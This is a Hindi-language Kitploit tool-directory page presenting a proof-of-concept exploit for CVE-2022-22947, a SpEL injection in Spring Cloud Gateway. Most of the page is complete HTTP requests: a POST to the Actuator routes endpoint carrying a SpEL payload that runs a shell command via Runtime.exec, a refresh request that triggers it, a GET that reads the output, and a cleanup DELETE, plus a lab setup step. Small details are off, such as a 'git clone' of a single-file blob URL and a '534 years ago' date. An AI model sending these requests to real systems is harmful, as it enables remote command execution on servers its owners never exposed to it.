Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22947 — CVE-2022-22947 के लिए PoC एक्सप्लॉइट: Spring Cloud Gateway में SpEL इंजेक्शन जो निर्मित Actuator API रूट्स के माध्यम से दूरस्थ कमांड निष्पादन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/greetdawn/cve-2022-22947
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणएपीआई सुरक्षा परीक्षणकमांड एंड कंट्रोल
GitHubgreetdawn/cve-2022-22947

CVE-2022-22947

CVE-2022-22947 के लिए PoC एक्सप्लॉइट: Spring Cloud Gateway में SpEL इंजेक्शन जो निर्मित Actuator API रूट्स के माध्यम से दूरस्थ कमांड निष्पादन सक्षम करता है।

रिपॉजिटरी देखें
534 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22947

Spring Cloud Gateway एक API गेटवे है जो Spring में है। इसके 3.1.0 और 3.0.6 संस्करणों (सहित) में एक SpEL एक्सप्रेशन इंजेक्शन कमजोरी मौजूद है। जब हमलावर Actuator API तक पहुँच सकता है, तो वह इस कमजोरी का उपयोग करके मनमानी कमांड निष्पादित कर सकता है।

कमजोरी का वातावरण

root@kitploit:~
git clone https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/docker-compose.yml
docker-compose up -d

कमजोरी का शोषण

routes इंटरफ़ेस पर निम्नलिखित डेटा पैकेट भेजें:

root@kitploit:~
POST /actuator/gateway/routes/greetdawn HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 329

{
  "id": "greetdawn",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
  }],
"uri": "http://example.com",
"order": 0
}

image-20220303145822027

उपरोक्त डेटा पैकेट देखने के बाद यह इंगित करता है कि नया रूट सफलतापूर्वक बनाया गया है।

फिर से निम्नलिखित डेटा पैकेट भेजें, अभी जोड़े गए रूट को लागू करने के लिए, SpEL एक्सप्रेशन निष्पादन को ट्रिगर करें:

root@kitploit:~
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 329


image-20220303150111513

अभी बनाए गए रूट का अनुरोध करें, दुर्भावनापूर्ण कोड को ट्रिगर करें:

root@kitploit:~
GET /actuator/gateway/routes/greetdawn HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 0


image-20220303150238309

नोट: निम्नलिखित रूट हटाएं

root@kitploit:~
DELETE /actuator/gateway/routes/greetdawn HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 0


image-20220303150340287

टूल डाउनलोड करें